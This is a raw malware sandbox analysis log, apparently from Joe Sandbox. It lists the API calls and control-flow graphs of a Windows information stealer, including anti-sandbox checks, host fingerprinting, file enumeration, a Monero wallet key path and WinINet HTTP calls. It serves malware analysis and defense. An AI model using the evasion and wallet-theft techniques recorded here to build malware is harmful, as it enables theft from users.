1340->1314 1341->1314 1342->1341 1343->1344 1344->1314 1345->1346 1346->1314 1348->1349 1349->1314 1353->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 007217C5
                                  • ExitProcess.KERNEL32 ref: 007217D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 690a527c2eaa6bc96a784f336cf0db660da64b82f0ea0e0cc7da1a0952343847
                                  • Instruction ID: 96677dc509c1ca86e452a3af41762d3bb304471aa8efbf1fae2843e37f06275a
                                  • Opcode Fuzzy Hash: 690a527c2eaa6bc96a784f336cf0db660da64b82f0ea0e0cc7da1a0952343847
                                  • Instruction Fuzzy Hash: 0951BFB4B14209EFDB04DFA1E964BBE77F9BF54304F208048E542A7240D778EA81DB62

                                  Control-flow Graph

                                  control_flow_graph 1356 727500-72754a GetWindowsDirectoryA 1357 727553-7275c7 GetVolumeInformationA call 728d00 * 3 1356->1357 1358 72754c 1356->1358 1365 7275d8-7275df 1357->1365 1358->1357 1366 7275e1-7275fa call 728d00 1365->1366 1367 7275fc-727617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 727628-727658 wsprintfA call 72a740 1367->1369 1370 727619-727626 call 72a740 1367->1370 1377 72767e-72768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00727542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0072757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0072760A
                                  • wsprintfA.USER32 ref: 00727640
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$s
                                  • API String ID: 1544550907-1529785113
                                  • Opcode ID: 8b147de7670e00a4e97401451aa9d2b29c8c6d8f702182ed1f005cb801541f22
                                  • Instruction ID: c6bb6bcf5e682df75d3eab7e261451910f1ad846060f03a1d4f401d61934ad3a
                                  • Opcode Fuzzy Hash: 8b147de7670e00a4e97401451aa9d2b29c8c6d8f702182ed1f005cb801541f22
                                  • Instruction Fuzzy Hash: F64183B1D05358EBDB14DF94DD45BDEBBB8EF08700F100199F60967280D7796A44CBA6

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222FF0), ref: 007298A1
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222F00), ref: 007298BA
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222ED0), ref: 007298D2
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222DB0), ref: 007298EA
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222E70), ref: 00729903
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01229B90), ref: 0072991B
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01217580), ref: 00729933
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,012174C0), ref: 0072994C
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222E28), ref: 00729964
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222D50), ref: 0072997C
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222D68), ref: 00729995
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222E88), ref: 007299AD
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01217660), ref: 007299C5
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222EB8), ref: 007299DE
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 007111D0: ExitProcess.KERNEL32 ref: 00711211
                                    • Part of subcall function 00711160: GetSystemInfo.KERNEL32(?), ref: 0071116A
                                    • Part of subcall function 00711160: ExitProcess.KERNEL32 ref: 0071117E
                                    • Part of subcall function 00711110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0071112B
                                    • Part of subcall function 00711110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00711132
                                    • Part of subcall function 00711110: ExitProcess.KERNEL32 ref: 00711143
                                    • Part of subcall function 00711220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0071123E
                                    • Part of subcall function 00711220: __aulldiv.LIBCMT ref: 00711258
                                    • Part of subcall function 00711220: __aulldiv.LIBCMT ref: 00711266
                                    • Part of subcall function 00711220: ExitProcess.KERNEL32 ref: 00711294
                                    • Part of subcall function 00726770: GetUserDefaultLangID.KERNEL32 ref: 00726774
                                    • Part of subcall function 00711190: ExitProcess.KERNEL32 ref: 007111C6
                                    • Part of subcall function 00727850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007111B7), ref: 00727880
                                    • Part of subcall function 00727850: RtlAllocateHeap.NTDLL(00000000), ref: 00727887
                                    • Part of subcall function 00727850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0072789F
                                    • Part of subcall function 007278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727910
                                    • Part of subcall function 007278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00727917
                                    • Part of subcall function 007278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0072792F
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00726AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00726AF9
                                  • Sleep.KERNEL32(00001770), ref: 00726B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726B1A
                                  • ExitProcess.KERNEL32 ref: 00726B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 5e96b362dc39d87a3db6ca5af62f60fb1745447c706ee2f5afbcea3be8efdbfb
                                  • Instruction ID: d39a4861f0696d21230e5616742347bae7338e8624c16db02afd6bdedc0febe0
                                  • Opcode Fuzzy Hash: 5e96b362dc39d87a3db6ca5af62f60fb1745447c706ee2f5afbcea3be8efdbfb
                                  • Instruction Fuzzy Hash: 1A314B70914228FBDB04FBF1EC5ABEE7778AF04301F504528F202A6182DF786945D7A6

                                  Control-flow Graph

                                  control_flow_graph 1436 711220-711247 call 7289b0 GlobalMemoryStatusEx 1439 711273-71127a 1436->1439 1440 711249-711271 call 72da00 * 2 1436->1440 1442 711281-711285 1439->1442 1440->1442 1444 711287 1442->1444 1445 71129a-71129d 1442->1445 1447 711292-711294 ExitProcess 1444->1447 1448 711289-711290 1444->1448 1448->1445 1448->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0071123E
                                  • __aulldiv.LIBCMT ref: 00711258
                                  • __aulldiv.LIBCMT ref: 00711266
                                  • ExitProcess.KERNEL32 ref: 00711294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 5190c00fcc2a6a2a36b70ce59827f20ae8c61135c67d848b48b9ba77e0b3b767
                                  • Instruction ID: 6f57a7674fa837a52da76af81e05294f97f330cafc7d8b03a612d3f0f0d41c1b
                                  • Opcode Fuzzy Hash: 5190c00fcc2a6a2a36b70ce59827f20ae8c61135c67d848b48b9ba77e0b3b767
                                  • Instruction Fuzzy Hash: 8401FFB0E44318EADF10DBE4DC4AB9DBB78BB14705F608144E705BA2C1D67859858799

                                  Control-flow Graph

                                  control_flow_graph 1450 726af3 1451 726b0a 1450->1451 1453 726aba-726ad7 call 72aad0 OpenEventA 1451->1453 1454 726b0c-726b22 call 726920 call 725b10 CloseHandle ExitProcess 1451->1454 1460 726af5-726b04 CloseHandle Sleep 1453->1460 1461 726ad9-726af1 call 72aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00726AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00726AF9
                                  • Sleep.KERNEL32(00001770), ref: 00726B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726B1A
                                  • ExitProcess.KERNEL32 ref: 00726B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: e147fee07109540fa0a7e12a7e43e24a5c195408e4838c3c1b624e08d02eee02
                                  • Instruction ID: e837d68b58d60f70c9a8e47e6a1b8c97cd5cda7edf75a49070b18881da394a3a
                                  • Opcode Fuzzy Hash: e147fee07109540fa0a7e12a7e43e24a5c195408e4838c3c1b624e08d02eee02
                                  • Instruction Fuzzy Hash: 95F05E70944329EFE710BBA0FC0ABBD7B34EF14702F208616B502A11C1CBB85540E75A

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 2bed1ec1947d971d32543715c96397f0834116ee6c8e297092b3b5156731a9af
                                  • Instruction ID: 65ed709ccd8f1f2146aaa4d493cb465042a2ccb4158cae21eea4db9425728bfa
                                  • Opcode Fuzzy Hash: 2bed1ec1947d971d32543715c96397f0834116ee6c8e297092b3b5156731a9af
                                  • Instruction Fuzzy Hash: 88213EB1D00209ABDF14DFA4E849ADE7B75FF44320F108625F915A72C1EB746A05CB81

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 00716280: InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
                                    • Part of subcall function 00716280: StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716303
                                    • Part of subcall function 00716280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
                                    • Part of subcall function 00716280: HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
                                    • Part of subcall function 00716280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
                                    • Part of subcall function 00716280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007163D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: e117d714f822fac1c5def7dbbcd42c39d16053754ed848bcae136939b592c5f9
                                  • Instruction ID: c1143f4f669cc57a144419e4243d39542591ebc4ae5ff9560e169f50eeeda037
                                  • Opcode Fuzzy Hash: e117d714f822fac1c5def7dbbcd42c39d16053754ed848bcae136939b592c5f9
                                  • Instruction Fuzzy Hash: 55110070910158FBDB14FF64ED5AAED7378AF54300F808168F91A5A592EF38AB05C691
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0072792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: eeb78bc594294701931979abe7a812ac99f1180ae2d14adb721a9ed76f567797
                                  • Instruction ID: fe6f471640823665ddf7764c6c477db344e2228aa0e36cbfa6c45866faaffc70
                                  • Opcode Fuzzy Hash: eeb78bc594294701931979abe7a812ac99f1180ae2d14adb721a9ed76f567797
                                  • Instruction Fuzzy Hash: 7C0186B1908304EBC714DF95DD45BABBBB8F704B11F104219F645E3380C3785940CBA1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0071112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00711132
                                  • ExitProcess.KERNEL32 ref: 00711143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 24660c2cab464d515c24df372af217dcbe24a9f0df6af433fb53d0bc4ca85c75
                                  • Instruction ID: f461eb7c58c763088e03c8d7d3888de6904c1388065474c9c9e858d15091ffc5
                                  • Opcode Fuzzy Hash: 24660c2cab464d515c24df372af217dcbe24a9f0df6af433fb53d0bc4ca85c75
                                  • Instruction Fuzzy Hash: 5CE0E670D5930CFBE710ABA59C0EB497A78AB04B12F504154F7097A5D0D6B52640A79D
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007110B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007110F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: d0b83ad2f82131f5402fb34704deae6dd2430bdcf7ff0e18ccaf01d9ee7c8c8d
                                  • Instruction ID: 1a6875d6d791802bd42cd0a25d85897c43240c43e0f4c1d8529f96551352abf4
                                  • Opcode Fuzzy Hash: d0b83ad2f82131f5402fb34704deae6dd2430bdcf7ff0e18ccaf01d9ee7c8c8d
                                  • Instruction Fuzzy Hash: 5EF0E271A41318BBE7149AA8AC49FAEB7ECE709B15F300548F604E7280D572AF40DBA5
                                  APIs
                                    • Part of subcall function 007278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727910
                                    • Part of subcall function 007278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00727917
                                    • Part of subcall function 007278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0072792F
                                    • Part of subcall function 00727850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007111B7), ref: 00727880
                                    • Part of subcall function 00727850: RtlAllocateHeap.NTDLL(00000000), ref: 00727887
                                    • Part of subcall function 00727850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0072789F
                                  • ExitProcess.KERNEL32 ref: 007111C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: ff1e38d0a8eaa145ad55595900f8070b1c0b8cf5dd12c64f873de1b15fd1880c
                                  • Instruction ID: 93294562a301e0b1351f477a306b4bee4d4d4c525d50cfbb5f487159d7239bf5
                                  • Opcode Fuzzy Hash: ff1e38d0a8eaa145ad55595900f8070b1c0b8cf5dd12c64f873de1b15fd1880c
                                  • Instruction Fuzzy Hash: 17E012B5D28315A3CB0473B5BD0FB2A369C5B14346F440524FA05D6152FE2DE800D66A
                                  APIs
                                  • wsprintfA.USER32 ref: 007238CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007238E3
                                  • lstrcat.KERNEL32(?,?), ref: 00723935
                                  • StrCmpCA.SHLWAPI(?,00730F70), ref: 00723947
                                  • StrCmpCA.SHLWAPI(?,00730F74), ref: 0072395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00723C67
                                  • FindClose.KERNEL32(000000FF), ref: 00723C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 1436a88c9db8c1669132637827a16e044b27bd14162e03cf48940dbd74755fcc
                                  • Instruction ID: 045d8ecd9ba04f4ea8127e9af187d4dcd8cf261f7a5dfa5a27dacc98a971bd9b
                                  • Opcode Fuzzy Hash: 1436a88c9db8c1669132637827a16e044b27bd14162e03cf48940dbd74755fcc
                                  • Instruction Fuzzy Hash: C4A142B19103189BDB24DF65DC89FEE7379BB48301F044588F64D96181EB79AB84CFA2
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00730B32,00730B2B,00000000,?,?,?,007313F4,00730B2A), ref: 0071BEF5
                                  • StrCmpCA.SHLWAPI(?,007313F8), ref: 0071BF4D
                                  • StrCmpCA.SHLWAPI(?,007313FC), ref: 0071BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0071C7D1
